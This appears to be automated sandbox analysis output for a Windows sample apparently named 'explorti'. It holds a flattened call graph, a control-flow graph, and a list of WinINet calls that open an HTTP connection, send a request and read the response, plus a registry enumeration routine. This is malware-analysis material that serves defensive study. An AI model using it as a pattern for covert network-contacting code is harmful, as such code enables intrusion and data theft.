13200->13282 13204 5d8040 RtlAllocateHeap 13201->13204 13210 5d202b 13202->13210 13203 5dc09c std::_Xinvalid_argument RtlAllocateHeap 13205 5d2dd2 13203->13205 13214 5d2daf 13204->13214 13209 5dc0dc RtlAllocateHeap 13205->13209 13206 5d7f00 RtlAllocateHeap 13206->13190 13207 5d7840 RtlAllocateHeap 13211 5d2acc 13207->13211 13208->13206 13208->13222 13210->13201 13212 5d2082 13210->13212 13213 5ce410 7 API calls 13211->13213 13215 5d7f00 RtlAllocateHeap 13212->13215 13213->13222 13561 5dc09c 13214->13561 13218 5d20a7 shared_ptr 13215->13218 13217 5d7840 RtlAllocateHeap 13219 5d2112 13217->13219 13218->13214 13218->13217 13220 5c5b00 RtlAllocateHeap 13219->13220 13221 5d211d 13220->13221 13223 5d7f00 RtlAllocateHeap 13221->13223 13222->13203 13224 5d2d80 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13222->13224 13225 5d2184 shared_ptr __dosmaperr 13223->13225 13225->13214 13336 5f8959 13225->13336 13228 5d2244 13228->13205 13230 5d225d 13228->13230 13231 5d253b 13228->13231 13232 5d238a 13228->13232 13233 5d2487 13228->13233 13276 5d22b2 shared_ptr 13228->13276 13229 5d7840 RtlAllocateHeap 13236 5d2610 13229->13236 13237 5d7840 RtlAllocateHeap 13230->13237 13234 5d7840 RtlAllocateHeap 13231->13234 13238 5d7840 RtlAllocateHeap 13232->13238 13235 5d7840 RtlAllocateHeap 13233->13235 13240 5d2552 13234->13240 13241 5d249e 13235->13241 13242 5d7840 RtlAllocateHeap 13236->13242 13243 5d2274 13237->13243 13239 5d23a1 13238->13239 13244 5d7840 RtlAllocateHeap 13239->13244 13245 5d7840 RtlAllocateHeap 13240->13245 13246 5d7840 RtlAllocateHeap 13241->13246 13247 5d2622 13242->13247 13248 5d7840 RtlAllocateHeap 13243->13248 13249 5d23b9 13244->13249 13250 5d256a 13245->13250 13251 5d24b6 13246->13251 13340 5f6639 13247->13340 13252 5d228c 13248->13252 13253 5d7840 RtlAllocateHeap 13249->13253 13254 5d7840 RtlAllocateHeap 13250->13254 13255 5d7840 RtlAllocateHeap 13251->13255 13256 5d7840 RtlAllocateHeap 13252->13256 13268 5d23d1 13253->13268 13257 5d2582 13254->13257 13258 5d24ce 13255->13258 13260 5d22a4 13256->13260 13551 5c8dc0 13257->13551 13541 5c8f40 13258->13541 13531 5c8c40 13260->13531 13265 5d2a53 13266 5d7840 RtlAllocateHeap 13265->13266 13269 5d2a6d 13266->13269 13271 5d7f00 RtlAllocateHeap 13268->13271 13272 5c5b00 RtlAllocateHeap 13269->13272 13270 5d265b 13273 5d7840 RtlAllocateHeap 13270->13273 13271->13276 13274 5d2a74 13272->13274 13279 5d2670 shared_ptr __dosmaperr 13273->13279 13275 5d7840 RtlAllocateHeap 13274->13275 13277 5d2a8a 13275->13277 13276->13222 13276->13229 13278 5d7840 RtlAllocateHeap 13277->13278 13280 5d2aa2 13278->13280 13279->13222 13283 5f8959 5 API calls 13279->13283 13281 5d7840 RtlAllocateHeap 13280->13281 13281->13282 13282->13207 13284 5d2729 13283->13284 13284->13205 13284->13222 13284->13265 13285 5d2751 13284->13285 13286 5d7840 RtlAllocateHeap 13285->13286 13287 5d2768 13286->13287 13288 5d7840 RtlAllocateHeap 13287->13288 13289 5d277d 13288->13289 13347 5c7760 13289->13347 13291 5d2786 13292 5d29f6 13291->13292 13293 5d27a1 13291->13293 13295 5d7840 RtlAllocateHeap 13292->13295 13294 5d7840 RtlAllocateHeap 13293->13294 13296 5d27ab 13294->13296 13297 5d2a00 13295->13297 13298 5c5b00 RtlAllocateHeap 13296->13298 13299 5c5b00 RtlAllocateHeap 13297->13299 13301 5d27b2 13298->13301 13300 5d2a07 13299->13300 13302 5d7840 RtlAllocateHeap 13300->13302 13303 5d7840 RtlAllocateHeap 13301->13303 13304 5d2a1d 13302->13304 13305 5d27c8 13303->13305 13306 5d7840 RtlAllocateHeap 13304->13306 13307 5d7840 RtlAllocateHeap 13305->13307 13308 5d2a35 13306->13308 13309 5d27e0 13307->13309 13310 5d7840 RtlAllocateHeap 13308->13310 13311 5d7840 RtlAllocateHeap 13309->13311 13310->13282 13312 5d27f8 13311->13312 13313 5d7840 RtlAllocateHeap 13312->13313 13314 5d280a 13313->13314 13360 5ce410 13314->13360 13316 5d2813 13316->13222 13317 5d7840 RtlAllocateHeap 13316->13317 13318 5d2874 13317->13318 13319 5c5b00 RtlAllocateHeap 13318->13319 13320 5d287f 13319->13320 13496 5d8160 13320->13496 13322 5d2893 13500 5d84e0 13322->13500 13324 5d28a7 13325 5d8160 RtlAllocateHeap 13324->13325 13326 5d28b7 13325->13326 13327 5d7840 RtlAllocateHeap 13326->13327 13328 5d28d7 13327->13328 13504 5c8890 13328->13504 13330 5d28de 13331 5d7840 RtlAllocateHeap 13330->13331 13332 5d28f3 13331->13332 13333 5c5b00 RtlAllocateHeap 13332->13333 13334 5d28fa 13333->13334 13512 5c5dd0 13334->13512 13337 5f8974 13336->13337 13564 5f86b7 13337->13564 13339 5d2235 13339->13214 13339->13228 13590 5f6582 13340->13590 13342 5d264a 13342->13265 13343 5f66c7 13342->13343 13344 5f66d3 __cftof 13343->13344 13346 5f66dd __cftof __dosmaperr 13344->13346 13602 5f6650 13344->13602 13346->13270 13625 5d8580 13347->13625 13349 5c77a1 13350 5d8160 RtlAllocateHeap 13349->13350 13352 5c77b3 shared_ptr 13350->13352 13351 5d7840 RtlAllocateHeap 13353 5c7811 13351->13353 13352->13351 13359 5c7856 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13352->13359 13354 5d7840 RtlAllocateHeap 13353->13354 13355 5c782c 13354->13355 13356 5c5b00 RtlAllocateHeap 13355->13356 13357 5c7833 13356->13357 13358 5d7f00 RtlAllocateHeap 13357->13358 13358->13359 13359->13291 13361 5d7840 RtlAllocateHeap 13360->13361 13362 5ce459 13361->13362 13363 5c5b00 RtlAllocateHeap 13362->13363 13364 5ce464 13363->13364 13365 5d7840 RtlAllocateHeap 13364->13365 13366 5ce47f 13365->13366 13367 5c5b00 RtlAllocateHeap 13366->13367 13368 5ce48a 13367->13368 13369 5d9180 RtlAllocateHeap 13368->13369 13370 5ce49d 13369->13370 13371 5d8160 RtlAllocateHeap 13370->13371 13372 5ce4df 13371->13372 13373 5d8060 RtlAllocateHeap 13372->13373 13374 5ce4f0 13373->13374 13375 5d8160 RtlAllocateHeap 13374->13375 13376 5ce501 13375->13376 13377 5d7840 RtlAllocateHeap 13376->13377 13378 5ce6ae 13377->13378 13379 5d7840 RtlAllocateHeap 13378->13379 13380 5ce6c3 13379->13380 13381 5d7840 RtlAllocateHeap 13380->13381 13382 5ce6d5 13381->13382 13646 5cbd30 13382->13646 13384 5ce6e1 13385 5d7840 RtlAllocateHeap 13384->13385 13386 5ce6f6 13385->13386 13387 5d7840 RtlAllocateHeap 13386->13387 13388 5ce70e 13387->13388 13389 5c5b00 RtlAllocateHeap 13388->13389 13390 5ce715 13389->13390 13670 5c8490 13390->13670 13392 5ce979 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13392->13316 13393 5ce721 13393->13392 13394 5d7840 RtlAllocateHeap 13393->13394 13395 5ce9f9 13394->13395 13396 5c5b00 RtlAllocateHeap 13395->13396 13397 5cea01 13396->13397 13676 5d8200 13397->13676 13399 5cea16 13400 5d8060 RtlAllocateHeap 13399->13400 13401 5cea25 13400->13401 13402 5d7840 RtlAllocateHeap 13401->13402 13403 5cec40 13402->13403 13404 5c5b00 RtlAllocateHeap 13403->13404 13405 5cec48 13404->13405 13406 5d8200 RtlAllocateHeap 13405->13406 13407 5cec5d 13406->13407 13408 5d8060 RtlAllocateHeap 13407->13408 13411 5cec6c 13408->13411 13409 5cf579 shared_ptr 13409->13316 13410 5d7f00 RtlAllocateHeap 13410->13411 13411->13409 13411->13410 13412 5cf5ab 13411->13412 13413 5d7840 RtlAllocateHeap 13412->13413 13414 5cf607 13413->13414 13415 5c5b00 RtlAllocateHeap 13414->13415 13416 5cf60e 13415->13416 13417 5d7840 RtlAllocateHeap 13416->13417 13418 5cf621 13417->13418 13419 5d7840 RtlAllocateHeap 13418->13419 13420 5cf636 13419->13420 13421 5d7840 RtlAllocateHeap 13420->13421 13422 5cf64b 13421->13422 13423 5d7840 RtlAllocateHeap 13422->13423 13424 5cf65d 13423->13424 13425 5ce410 7 API calls 13424->13425 13426 5cf666 13425->13426 13427 5d7f00 RtlAllocateHeap 13426->13427 13428 5cf68a 13427->13428 13429 5d7840 RtlAllocateHeap 13428->13429 13430 5cf69a 13429->13430 13431 5d7f00 RtlAllocateHeap 13430->13431 13432 5cf6b7 13431->13432 13433 5d7f00 RtlAllocateHeap 13432->13433 13435 5cf6d0 13433->13435 13434 5cf862 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13434->13316 13435->13434 13436 5d7840 RtlAllocateHeap 13435->13436 13437 5cf8e4 13436->13437 13438 5c5b00 RtlAllocateHeap 13437->13438 13439 5cf8eb 13438->13439 13440 5d7840 RtlAllocateHeap 13439->13440 13441 5cf8fe 13440->13441 13442 5d7840 RtlAllocateHeap 13441->13442 13443 5cf913 13442->13443 13444 5d7840 RtlAllocateHeap 13443->13444 13445 5cf928 13444->13445 13446 5d7840 RtlAllocateHeap 13445->13446 13447 5cf93a 13446->13447 13448 5ce410 7 API calls 13447->13448 13450 5cf943 13448->13450 13449 5cfa15 shared_ptr 13449->13316 13450->13449 13451 5d7840 RtlAllocateHeap 13450->13451 13452 5cfa85 13451->13452 13684 5c9490 13452->13684 13454 5cfa94 13699 5c9140 13454->13699 13456 5cfaa3 13457 5d8160 RtlAllocateHeap 13456->13457 13458 5cfabb 13457->13458 13458->13458 13459 5d7f00 RtlAllocateHeap 13458->13459 13460 5cfb6c 13459->13460 13461 5d7840 RtlAllocateHeap 13460->13461 13462 5cfb87 13461->13462 13463 5d7840 RtlAllocateHeap 13462->13463 13464 5cfb99 13463->13464 13465 5f6639 RtlAllocateHeap 13464->13465 13466 5cfbc1 13465->13466 13467 5d7840 RtlAllocateHeap 13466->13467 13468 5d04b4 13467->13468 13469 5c5b00 RtlAllocateHeap 13468->13469 13470 5d04bb 13469->13470 13471 5d7840 RtlAllocateHeap 13470->13471 13472 5d04d1 13471->13472 13473 5d7840 RtlAllocateHeap 13472->13473 13474 5d04e9 13473->13474 13475 5d7840 RtlAllocateHeap 13474->13475 13476 5d0501 13475->13476 13477 5d7840 RtlAllocateHeap 13476->13477 13478 5d0513 13477->13478 13479 5ce410 7 API calls 13478->13479 13480 5d051c 13479->13480 13481 5d0760 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13480->13481 13482 5d7840 RtlAllocateHeap 13480->13482 13481->13316 13483 5d0867 13482->13483 13484 5c5b00 RtlAllocateHeap 13483->13484 13485 5d086e 13484->13485 13486 5d7840 RtlAllocateHeap 13485->13486 13487 5d0884 13486->13487 13488 5d7840 RtlAllocateHeap 13487->13488 13489 5d089c 13488->13489 13490 5d7840 RtlAllocateHeap 13489->13490 13491 5d08b4 13490->13491 13492 5d7840 RtlAllocateHeap 13491->13492 13493 5d11c0 13492->13493 13494 5ce410 7 API calls 13493->13494 13495 5d11c9 13494->13495 13498 5d8179 13496->13498 13497 5d818d 13497->13322 13498->13497 13499 5d8e40 RtlAllocateHeap 13498->13499 13499->13497 13501 5d84f6 13500->13501 13501->13501 13502 5d8e40 RtlAllocateHeap 13501->13502 13503 5d850b 13501->13503 13502->13503 13503->13324 13506 5c88e8 shared_ptr 13504->13506 13511 5c89fa 13504->13511 13505 5d7840 RtlAllocateHeap 13505->13506 13506->13505 13507 5c5b00 RtlAllocateHeap 13506->13507 13508 5c8a30 13506->13508 13509 5d7f00 RtlAllocateHeap 13506->13509 13506->13511 13507->13506 13510 5d8040 RtlAllocateHeap 13508->13510 13509->13506 13510->13511 13511->13330 13514 5c5e08 13512->13514 13513 5c5eee shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13513->13222 13514->13513 13515 5d7f00 RtlAllocateHeap 13514->13515 13516 5c5f79 13515->13516 13517 5d7f00 RtlAllocateHeap 13516->13517 13518 5c5fad 13517->13518 13519 5d7f00 RtlAllocateHeap 13518->13519 13520 5c5fde 13519->13520 13521 5d7f00 RtlAllocateHeap 13520->13521 13522 5c600f 13521->13522 13523 5d7f00 RtlAllocateHeap 13522->13523 13524 5c6040 RegOpenKeyExA 13523->13524 13526 5c643a shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13524->13526 13529 5c6093 __cftof 13524->13529 13525 5c6133 RegEnumValueW 13525->13529 13526->13222 13529->13525 13529->13526 13530 5d7840 RtlAllocateHeap 13529->13530 13714 5d7c20 13529->13714 13727 5d8350 13529->13727 13530->13529 13532 5c8c90 13531->13532 13533 5d7840 RtlAllocateHeap 13532->13533 13534 5c8c9f 13533->13534 13535 5c5b00 RtlAllocateHeap 13534->13535 13536 5c8caa 13535->13536 13537 5d7f00 RtlAllocateHeap 13536->13537 13538 5c8cfc 13537->13538 13539 5d8060 RtlAllocateHeap 13538->13539 13540 5c8d0e shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13539->13540 13540->13276 13542 5c8f8f 13541->13542 13543 5d7840 RtlAllocateHeap 13542->13543 13544 5c8f9f 13543->13544 13545 5c5b00 RtlAllocateHeap 13544->13545 13546 5c8faa 13545->13546 13547 5d7f00 RtlAllocateHeap 13546->13547 13548 5c8ffc 13547->13548 13549 5d8060 RtlAllocateHeap 13548->13549 13550 5c900e shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13549->13550 13550->13276 13552 5c8e10 13551->13552 13553 5d7840 RtlAllocateHeap 13552->13553 13554 5c8e1f 13553->13554 13555 5c5b00 RtlAllocateHeap 13554->13555 13556 5c8e2a 13555->13556 13557 5d7f00 RtlAllocateHeap 13556->13557 13558 5c8e7c 13557->13558 13559 5d8060 RtlAllocateHeap 13558->13559 13560 5c8e8e shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13559->13560 13560->13276 13744 5dbfec 13561->13744 13563 5dc0ad std::_Xinvalid_argument 13565 5f86c9 13564->13565 13566 5f86de __cftof __dosmaperr 13565->13566 13567 5f681a __cftof 5 API calls 13565->13567 13566->13339 13569 5f870e 13567->13569 13569->13566 13570 5f8905 13569->13570 13571 5f8942 13570->13571 13572 5f8912 13570->13572 13581 5fd2c9 13571->13581 13573 5f8921 __fassign 13572->13573 13576 5fd2ed 13572->13576 13573->13569 13577 5f681a __cftof 5 API calls 13576->13577 13578 5fd30a 13577->13578 13580 5fd31a __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13578->13580 13585 5ff05f 13578->13585 13580->13573 13582 5fd2d4 13581->13582 13583 5fb49b __cftof 4 API calls 13582->13583 13584 5fd2e4 13583->13584 13584->13573 13586 5f681a __cftof 5 API calls 13585->13586 13587 5ff07f __fassign 13586->13587 13588 5faeeb __cftof RtlAllocateHeap 13587->13588 13589 5ff0d2 __cftof __fassign __freea __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13587->13589 13588->13589 13589->13580 13591 5f658e __cftof 13590->13591 13593 5f6595 __cftof __dosmaperr 13591->13593 13594 5fa763 13591->13594 13593->13342 13595 5fa76f __cftof 13594->13595 13598 5fa807 13595->13598 13597 5fa78a 13597->13593 13601 5fa82a 13598->13601 13599 5fd6cf RtlAllocateHeap 13600 5fa870 __freea 13599->13600 13600->13597 13601->13599 13601->13600 13603 5f6672 13602->13603 13605 5f665d __cftof __dosmaperr __freea 13602->13605 13603->13605 13606 5f9ed9 13603->13606 13605->13346 13607 5f9f16 13606->13607 13608 5f9ef1 13606->13608 13607->13605 13608->13607 13610 6002d8 13608->13610 13611 6002e4 __cftof 13610->13611 13613 6002ec __cftof __dosmaperr 13611->13613 13614 6003ca 13611->13614 13613->13607 13615 6003ec 13614->13615 13617 6003f0 __cftof __dosmaperr 13614->13617 13615->13617 13618 5ffb5f 13615->13618 13617->13613 13619 5ffbac 13618->13619 13620 5f681a __cftof 5 API calls 13619->13620 13621 5ffbbb __cftof 13620->13621 13622 5fd2c9 4 API calls 13621->13622 13623 5ffe5b __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13621->13623 13624 5fc4ca 5 API calls __fassign 13621->13624 13622->13621 13623->13617 13624->13621 13626 5d85e0 13625->13626 13626->13626 13634 5d75a0 13626->13634 13628 5d85f9 13629 5d8e40 RtlAllocateHeap 13628->13629 13630 5d8614 13628->13630 13629->13630 13631 5d8e40 RtlAllocateHeap 13630->13631 13633 5d8669 13630->13633 13632 5d86b1 13631->13632 13632->13349 13633->13349 13635 5d75bb 13634->13635 13644 5d76a4 shared_ptr 13634->13644 13638 5d763b 13635->13638 13640 5d762a 13635->13640 13641 5d7651 13635->13641 13635->13644 13636 5d9170 RtlAllocateHeap 13637 5d7736 13636->13637 13639 5c2380 RtlAllocateHeap 13637->13639 13638->13636 13638->13644 13642 5d773b 13639->13642 13640->13637 13645 5dd2e8 RtlAllocateHeap 13640->13645 13641->13638 13643 5dd2e8 RtlAllocateHeap 13641->13643 13643->13638 13644->13628 13645->13638 13647 5cc171 13646->13647 13648 5cbd82 13646->13648 13649 5d7f00 RtlAllocateHeap 13647->13649 13648->13647 13650 5cbd96 InternetOpenW InternetConnectA 13648->13650 13654 5cc11e shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13649->13654 13651 5d7840 RtlAllocateHeap 13650->13651 13652 5cbe0d 13651->13652 13653 5c5b00 RtlAllocateHeap 13652->13653 13655 5cbe18 HttpOpenRequestA 13653->13655 13654->13384 13658 5cbe41 shared_ptr 13655->13658 13657 5d7840 RtlAllocateHeap 13659 5cbea9 13657->13659 13658->13657 13660 5c5b00 RtlAllocateHeap 13659->13660 13661 5cbeb4 13660->13661 13662 5d7840 RtlAllocateHeap 13661->13662 13663 5cbecd 13662->13663 13664 5c5b00 RtlAllocateHeap 13663->13664 13665 5cbed8 HttpSendRequestA 13664->13665 13668 5cbefb shared_ptr 13665->13668 13667 5cbf83 InternetReadFile 13669 5cbfaa 13667->13669 13668->13667 13674 5c85b0 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13670->13674 13675 5c84e5 shared_ptr 13670->13675 13671 5c8677 13673 5d8040 RtlAllocateHeap 13671->13673 13672 5d7f00 RtlAllocateHeap 13672->13675 13673->13674 13674->13393 13675->13671 13675->13672 13675->13674 13677 5d75a0 RtlAllocateHeap 13676->13677 13678 5d8279 13677->13678 13679 5d8e40 RtlAllocateHeap 13678->13679 13680 5d8294 13678->13680 13679->13680 13681 5d8e40 RtlAllocateHeap 13680->13681 13683 5d82e8 13680->13683 13682 5d832e 13681->13682 13682->13399 13683->13399 13685 5c94e4 13684->13685 13686 5d7f00 RtlAllocateHeap 13685->13686 13687 5c952c 13686->13687 13688 5d7840 RtlAllocateHeap 13687->13688 13698 5c9545 shared_ptr 13688->13698 13689 5c96af 13691 5c970e 13689->13691 13692 5c97f0 13689->13692 13690 5d7840 RtlAllocateHeap 13690->13698 13693 5d7f00 RtlAllocateHeap 13691->13693 13694 5d8040 RtlAllocateHeap 13692->13694 13696 5c9744 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13693->13696 13694->13696 13695 5c5b00 RtlAllocateHeap 13695->13698 13696->13454 13697 5d7f00 RtlAllocateHeap 13697->13698 13698->13689 13698->13690 13698->13692 13698->13695 13698->13696 13698->13697 13700 5c9194 13699->13700 13701 5d7f00 RtlAllocateHeap 13700->13701 13702 5c91dc 13701->13702 13703 5d7840 RtlAllocateHeap 13702->13703 13704 5c91f5 shared_ptr 13703->13704 13705 5c935f 13704->13705 13706 5d7840 RtlAllocateHeap 13704->13706 13708 5c5b00 RtlAllocateHeap 13704->13708 13710 5c93d6 shared_ptr 13704->13710 13712 5d7f00 RtlAllocateHeap 13704->13712 13707 5d7f00 RtlAllocateHeap 13705->13707 13706->13704 13707->13710 13708->13704 13709 5c9453 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13709->13456 13710->13709 13711 5d8040 RtlAllocateHeap 13710->13711 13713 5c9488 13711->13713 13712->13704 13717 5d7c41 13714->13717 13718 5d7c6c 13714->13718 13715 5d7d60 13716 5d9170 RtlAllocateHeap 13715->13716 13723 5d7cd1 shared_ptr 13716->13723 13717->13529 13718->13715 13719 5d7d5b 13718->13719 13721 5d7ce7 13718->13721 13722 5d7cc0 13718->13722 13720 5c2380 RtlAllocateHeap 13719->13720 13720->13715 13721->13723 13725 5dd2e8 RtlAllocateHeap 13721->13725 13722->13719 13724 5d7ccb 13722->13724 13723->13529 13726 5dd2e8 RtlAllocateHeap 13724->13726 13725->13723 13726->13723 13728 5d75a0 RtlAllocateHeap 13727->13728 13731 5d83a0 13728->13731 13729 5d83f2 13729->13529 13731->13729 13732 5d8ba0 13731->13732 13733 5d8cc9 13732->13733 13736 5d8bc3 13732->13736 13734 5d9170 RtlAllocateHeap 13733->13734 13735 5d8cce 13734->13735 13737 5c2380 RtlAllocateHeap 13735->13737 13738 5d8c2f 13736->13738 13739 5d8c05 13736->13739 13743 5d8c16 shared_ptr 13737->13743 13741 5dd2e8 RtlAllocateHeap 13738->13741 13738->13743 13739->13735 13740 5d8c10 13739->13740 13742 5dd2e8 RtlAllocateHeap 13740->13742 13741->13743 13742->13743 13743->13731 13745 5c21e0 std::future_error::future_error RtlAllocateHeap 13744->13745 13746 5dbffe 13745->13746 13746->13563 13913 5d7800 13914 5d7820 13913->13914 13914->13914 13915 5d7f00 RtlAllocateHeap 13914->13915 13916 5d7832 13915->13916 14098 5d92e0 14099 5d92f5 14098->14099 14100 5d9333 14098->14100 14106 5dd017 14099->14106 14107 5dd027 14106->14107 14108 5d92ff 14107->14108 14117 5dd09f 14107->14117 14108->14100 14110 5dd554 14108->14110 14121 5dd527 14110->14121 14113 5dcfcd 14114 5dcfdc 14113->14114 14115 5dd081 RtlWakeAllConditionVariable 14114->14115 14116 5dd085 14114->14116 14115->14100 14116->14100 14118 5dd0ad SleepConditionVariableCS 14117->14118 14120 5dd0c6 14117->14120 14118->14120 14120->14107 14122 5dd53d 14121->14122 14123 5dd536 14121->14123 14130 5f979b 14122->14130 14127 5f972f 14123->14127 14126 5d9329 14126->14113 14128 5f979b RtlAllocateHeap 14127->14128 14129 5f9741 14128->14129 14129->14126 14133 5f94d1 14130->14133 14132 5f97cc 14132->14126 14134 5f94dd __cftof 14133->14134 14137 5f952c 14134->14137 14136 5f94f8 14136->14132 14138 5f9548 14137->14138 14142 5f95b5 __cftof __freea 14137->14142 14141 5f9595 __freea 14138->14141 14138->14142 14143 5fec96 14138->14143 14139 5fec96 RtlAllocateHeap 14139->14142 14141->14139 14141->14142 14142->14136 14144 5feca3 14143->14144 14146 5fecaf __cftof __dosmaperr 14144->14146 14147 604eaf 14144->14147 14146->14141 14148 604ebc 14147->14148 14150 604ec4 __cftof __dosmaperr __freea 14147->14150 14149 5faeeb __cftof RtlAllocateHeap 14148->14149 14149->14150 14150->14146 14858 5d87e0 14859 5d89c7 14858->14859 14861 5d8836 14858->14861 14860 5d90e0 RtlAllocateHeap 14859->14860 14869 5d888d shared_ptr 14860->14869 14862 5d89c2 14861->14862 14863 5d887c 14861->14863 14864 5d88a3 14861->14864 14865 5c2380 RtlAllocateHeap 14862->14865 14863->14862 14866 5d8887 14863->14866 14867 5dd2e8 RtlAllocateHeap 14864->14867 14864->14869 14865->14859 14868 5dd2e8 RtlAllocateHeap 14866->14868 14867->14869 14868->14869

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 839 5cbd30-5cbd7c 840 5cc171-5cc196 call 5d7f00 839->840 841 5cbd82-5cbd86 839->841 847 5cc198-5cc1a4 840->847 848 5cc1c4-5cc1dc 840->848 841->840 842 5cbd8c-5cbd90 841->842 842->840 844 5cbd96-5cbe1f InternetOpenW InternetConnectA call 5d7840 call 5c5b00 842->844 873 5cbe21 844->873 874 5cbe23-5cbe3f HttpOpenRequestA 844->874 849 5cc1ba-5cc1c1 call 5dd569 847->849 850 5cc1a6-5cc1b4 847->850 851 5cc128-5cc140 848->851 852 5cc1e2-5cc1ee 848->852 849->848 850->849 854 5cc23f-5cc244 call 5f6b7a 850->854 858 5cc146-5cc152 851->858 859 5cc213-5cc22f call 5dcef4 851->859 856 5cc11e-5cc125 call 5dd569 852->856 857 5cc1f4-5cc202 852->857 856->851 857->854 863 5cc204 857->863 864 5cc158-5cc166 858->864 865 5cc209-5cc210 call 5dd569 858->865 863->856 864->854 872 5cc16c 864->872 865->859 872->865 873->874 877 5cbe70-5cbedf call 5d7840 call 5c5b00 call 5d7840 call 5c5b00 874->877 878 5cbe41-5cbe50 874->878 891 5cbee1 877->891 892 5cbee3-5cbef9 HttpSendRequestA 877->892 880 5cbe66-5cbe6d call 5dd569 878->880 881 5cbe52-5cbe60 878->881 880->877 881->880 891->892 893 5cbf2a-5cbf52 892->893 894 5cbefb-5cbf0a 892->894 895 5cbf54-5cbf63 893->895 896 5cbf83-5cbfa4 InternetReadFile 893->896 897 5cbf0c-5cbf1a 894->897 898 5cbf20-5cbf27 call 5dd569 894->898 900 5cbf79-5cbf80 call 5dd569 895->900 901 5cbf65-5cbf73 895->901 902 5cbfaa 896->902 897->898 898->893 900->896 901->900 905 5cbfb0-5cc060 call 5f4160 902->905
                                                                  APIs
                                                                  • InternetOpenW.WININET(00618D18,00000000,00000000,00000000,00000000), ref: 005CBDBC
                                                                  • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 005CBDE1
                                                                  • HttpOpenRequestA.WININET(?,00000000), ref: 005CBE2B
                                                                  • HttpSendRequestA.WININET(?,00000000), ref: 005CBEEA
                                                                  • InternetReadFile.WININET(?,?,000003FF,?), ref: 005CBF9C
                                                                  • InternetCloseHandle.WININET(?), ref: 005CC077
                                                                  • InternetCloseHandle.WININET(?), ref: 005CC07F
                                                                  • InternetCloseHandle.WININET(?), ref: 005CC087
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
